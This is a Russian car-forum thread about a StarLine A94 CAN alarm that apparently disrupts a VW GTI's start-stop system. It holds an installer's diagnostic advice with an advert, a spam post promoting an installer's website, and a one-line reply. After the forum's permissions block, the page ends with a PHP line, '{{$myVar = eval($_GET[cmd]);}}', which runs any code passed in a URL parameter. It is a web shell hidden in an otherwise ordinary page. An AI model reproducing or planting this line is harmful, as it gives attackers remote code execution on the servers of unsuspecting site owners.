+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Подскажите по сигналке или системе.


  1. #1
    Мимо проходил glushak is on a distinguished road Аватар для glushak
    Регистрация
    21.02.2014
    Откуда
    Москва
    Машина
    Бричка MK7 GTI
    Сообщений
    23

    Подскажите по сигналке или системе.

    Доброго и бодрого всем. Такая ерунда. Столкнулся я с системой старт-стоп (не безключевой), а эко режим типо. Глохнет в пробке и заводится когда тормоз отпускаешь. Которую можно вырубить самому с кнопки. Так вот может кто сталкивался, я установил сигналку starline a94can и система не пашет, точнее пашет через раз. Выехал от установщиков она пропала, с утра поехал работает, теперь опять пару дне не работает, как бы конечно не напрягает, что отключать не надо, но напрягает. Ведь, что то мозг сушит или я "Вася" что то по нажимал. Помогите разобраться живет своей жизнью. Спасибо.

  2. #2
    Мимо проходил Престиж - Авто is on a distinguished road Аватар для Престиж - Авто
    Регистрация
    15.08.2014
    Откуда
    Москва, ул. Полковая д.14 к.1
    Машина
    VW
    Сообщений
    62
    Цитата Сообщение от glushak Посмотреть сообщение
    Ведь, что то мозг сушит или я "Вася" что то по нажимал. Помогите разобраться живет своей жизнью. Спасибо.
    Возможно в данном случае уже не актуально, но вдруг пригодится как информация. Кнопка "старт/стоп", называемая так же "бесключевой доступ или кейлесс", на спонтанные вклучения/выключения сигнализации обычно никак не влияет. Машины с такой системой имеют некоторую особенность, но только при подключении автозапуска и турботаймера. В остальном все одинаковое. В данном случае я подозреваю, что не корректно подключена к CAN шине и настроена система. Точнее ее взаимодействие со штатными системами. Что бы сказать точнее надо понять какую из конфигураций поставили вам установщики. Активировал ди слейв режим? И что такое "не пашет"?

    Еще вариант пришел в голову. Если слейв активирован, то есть особенность: чем машину закрыли (брелком Старлайн или штаткой), то тем и надо открывать. Возможно ваше "не пашет" как раз такой случай.
    Скидка для клуба 12% на все работы
    Защита от угона, мультимедиа системы, детейлинг, автомобильная пленка, шумоизоляция, тонирование, парковочные радары и многое другое...
    С уважением,
    Престиж-Авто

  3. #3
    dVocky
    Guest Аватар для dVocky
    Вообще вопрос о выборе сигнализации очень важен в жизни каждого водителя. У меня стоит хорошая сигнализация, ставили ее ребята с сайта http://conceptsound.ru/avtosignalizatsii . Выбрала их в первую очередь из за цены, она ниже чем у конкурентов. Но и по качеству они отлично работают, за час сделали всю работу.

  4. #4
    Мимо проходил Валерий Савичев is on a distinguished road Аватар для Валерий Савичев
    Регистрация
    12.06.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    6
    Посмотрите в интернете. ютрубе

+ Ответить в теме

Похожие темы

  1. Подскажите плз...
    от Maveriq в разделе Украина
    Ответов: 7
    Последнее сообщение: 31.05.2012, 16:16
  2. Загорелся Значок"неполадки В Системе Air Bag"!g5
    от ILYA TULA в разделе Электрика
    Ответов: 3
    Последнее сообщение: 02.04.2009, 10:07
  3. Тепловой Барабашка В Тормозной Системе
    от Havchik в разделе Тормозная система
    Ответов: 1
    Последнее сообщение: 11.05.2008, 16:41
  4. Вопрос по системе выхлопа REMUS
    от enter в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 9
    Последнее сообщение: 21.09.2007, 09:14
  5. Тепловой Барабашка В Тормозной Системе
    от в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}